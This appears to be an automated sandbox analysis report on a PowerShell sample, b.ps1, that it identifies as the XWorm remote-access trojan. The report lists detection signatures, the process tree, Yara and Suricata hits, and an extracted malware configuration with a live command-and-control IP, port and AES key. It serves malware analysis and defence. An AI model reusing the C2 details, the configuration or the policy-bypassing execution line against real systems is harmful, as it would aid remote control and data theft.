Create Interactive Tour

Windows Analysis Report
b.ps1

Overview

General Information

Sample name:b.ps1
Analysis ID:1599699
MD5:b5008db49b4ac5e668451b9a34ce2b76
SHA1:820ebe8c35bf4c57e1e439e4b10cee8186c444d3
SHA256:7367d1b56aca0b585cef8466d8d9a83dac03f0e6d81f9e89567c10a2cc44a4bc
Tags:176-113-115-228bookingps1user-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • powershell.exe (PID: 3716 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 6568 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • WerFault.exe (PID: 3788 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 880 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • wermgr.exe (PID: 7140 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3716" "2640" "2540" "2656" "0" "0" "2660" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup
{
  "C2 url": [
    "176.113.115.228"
  ],
  "Port": 4412,
  "Aes key": "P0WER",
  "SPL": "<Xwormmm>",
  "Install file": "USB.exe"
}
SourceRuleDescriptionAuthorStrings
00000003.00000002.4338325548.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000003.00000002.4338325548.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xd1da:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xd277:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xd38c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xcf1c:$cnc4: POST / HTTP/1.1
    00000003.00000002.4340987484.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x49342:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x493df:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x494f4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x49084:$cnc4: POST / HTTP/1.1
        Click to see the 6 entries
        SourceRuleDescriptionAuthorStrings
        0.2.powershell.exe.1dd90374f68.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
          0.2.powershell.exe.1dd90374f68.2.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
          • 0x92a1:$str01: $VB$Local_Port
          • 0x92c5:$str02: $VB$Local_Host
          • 0x7702:$str03: get_Jpeg
          • 0x7c98:$str04: get_ServicePack
          • 0xa2c0:$str05: Select * from AntivirusProduct
          • 0xaafa:$str06: PCRestart
          • 0xab0e:$str07: shutdown.exe /f /r /t 0
          • 0xabc0:$str08: StopReport
          • 0xab96:$str09: StopDDos
          • 0xac8c:$str10: sendPlugin
          • 0xad0c:$str11: OfflineKeylogger Not Enabled
          • 0xae64:$str12: -ExecutionPolicy Bypass -File "
          • 0xb401:$str13: Content-length: 5235
          0.2.powershell.exe.1dd90374f68.2.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xb5da:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0xb677:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0xb78c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xb31c:$cnc4: POST / HTTP/1.1
          0.2.powershell.exe.1dd8f552668.4.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.2.powershell.exe.1dd8f552668.4.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0x92a1:$str01: $VB$Local_Port
            • 0x92c5:$str02: $VB$Local_Host
            • 0x7702:$str03: get_Jpeg
            • 0x7c98:$str04: get_ServicePack
            • 0xa2c0:$str05: Select * from AntivirusProduct
            • 0xaafa:$str06: PCRestart
            • 0xab0e:$str07: shutdown.exe /f /r /t 0
            • 0xabc0:$str08: StopReport
            • 0xab96:$str09: StopDDos
            • 0xac8c:$str10: sendPlugin
            • 0xad0c:$str11: OfflineKeylogger Not Enabled
            • 0xae64:$str12: -ExecutionPolicy Bypass -File "
            • 0xb401:$str13: Content-length: 5235
            Click to see the 10 entries

            System Summary

            barindex
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1", ProcessId: 3716, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1", ProcessId: 3716, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-26T10:34:28.769948+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:34:36.918088+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:34:40.555436+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:34:52.350845+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:35:04.163753+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:35:06.917867+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:35:15.963703+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:35:25.653662+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:35:25.854717+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:35:26.619507+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:35:31.488042+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:35:31.901153+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:35:36.906588+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:35:41.125293+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:35:52.921008+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:35:56.558294+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:03.438235+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:03.562563+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:03.688443+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:03.811883+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:03.934237+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:06.915056+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:08.851433+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:08.974394+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:09.104641+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:09.576639+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:22.254524+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:22.255919+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:22.256062+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:22.256207+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:22.472568+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:24.397558+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:34.555246+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:35.219704+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:36.902304+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:47.007422+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:36:58.808052+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:37:04.368257+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:37:06.917682+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:37:07.432087+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:37:11.273258+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:37:23.070700+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:37:31.646275+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:37:31.767760+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:37:36.936336+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            2025-01-26T10:37:43.523152+010028528701Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-26T10:34:28.814226+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:34:40.558655+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:34:52.357325+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:35:04.166179+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:35:15.967787+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:35:25.655476+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:35:25.864086+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:35:26.643517+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:35:31.490610+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:35:31.946435+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:35:41.127120+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:35:52.923666+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:35:56.564382+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:36:03.442442+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:36:03.564213+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:36:03.689951+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:36:03.820321+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:36:03.942247+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:36:08.857621+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:36:08.976077+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:36:09.106351+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:36:09.578400+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:36:22.257763+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:36:22.474521+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:36:24.399249+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:36:34.559337+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:36:35.221750+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:36:47.011390+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:36:58.809874+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:37:04.373284+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:37:07.434211+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:37:11.275725+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:37:23.204297+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:37:31.648147+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:37:31.769145+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            2025-01-26T10:37:43.537690+010028529231Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-26T10:34:36.918088+010028588011Malware Command and Control Activity Detected176.113.115.2284412192.168.2.549709TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-26T10:36:24.180863+010028587991Malware Command and Control Activity Detected192.168.2.549709176.113.115.2284412TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 0.2.powershell.exe.1dd8f552668.4.unpackMalware Configuration Extractor: Xworm {"C2 url": ["176.113.115.228"], "Port": 4412, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
            Source: b.ps1Virustotal: Detection: 13%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Source: 0.2.powershell.exe.1dd8f552668.4.unpackString decryptor: 176.113.115.228
            Source: 0.2.powershell.exe.1dd8f552668.4.unpackString decryptor: 4412
            Source: 0.2.powershell.exe.1dd8f552668.4.unpackString decryptor: P0WER
            Source: 0.2.powershell.exe.1dd8f552668.4.unpackString decryptor: <Xwormmm>
            Source: 0.2.powershell.exe.1dd8f552668.4.unpackString decryptor: XWorm
            Source: 0.2.powershell.exe.1dd8f552668.4.unpackString decryptor: USB.exe
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.pdby source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbC source: RegSvcs.exe, 00000003.00000002.4338557949.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb[& source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Core.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdbs* source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: mscorlib.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\RegSvcs.pdb{& source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbj? source: RegSvcs.exe, 00000003.00000002.4338557949.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb;&L source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Management.pdb@ source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Xml.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.ni.pdbRSDS source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: n.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbK* source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: n0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2405232656.000001DDA75F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: mscorlib.pdb/ source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Configuration.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: mscorlib.pdboft.NET/Framework/v4.0.30319/RegSvcs.exe// source: RegSvcs.exe, 00000003.00000002.4338557949.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: %%.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp, WERD60D.tmp.dmp.11.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbv source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbtP]q source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Drawing.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Management.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Management.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.pdb4 source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Core.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb` source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERD60D.tmp.dmp.11.dr
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49709 -> 176.113.115.228:4412
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 176.113.115.228:4412 -> 192.168.2.5:49709
            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:49709 -> 176.113.115.228:4412
            Source: Network trafficSuricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 176.113.115.228:4412 -> 192.168.2.5:49709
            Source: Network trafficSuricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49709 -> 176.113.115.228:4412
            Source: Malware configuration extractorURLs: 176.113.115.228
            Source: global trafficTCP traffic: 192.168.2.5:49709 -> 176.113.115.228:4412
            Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
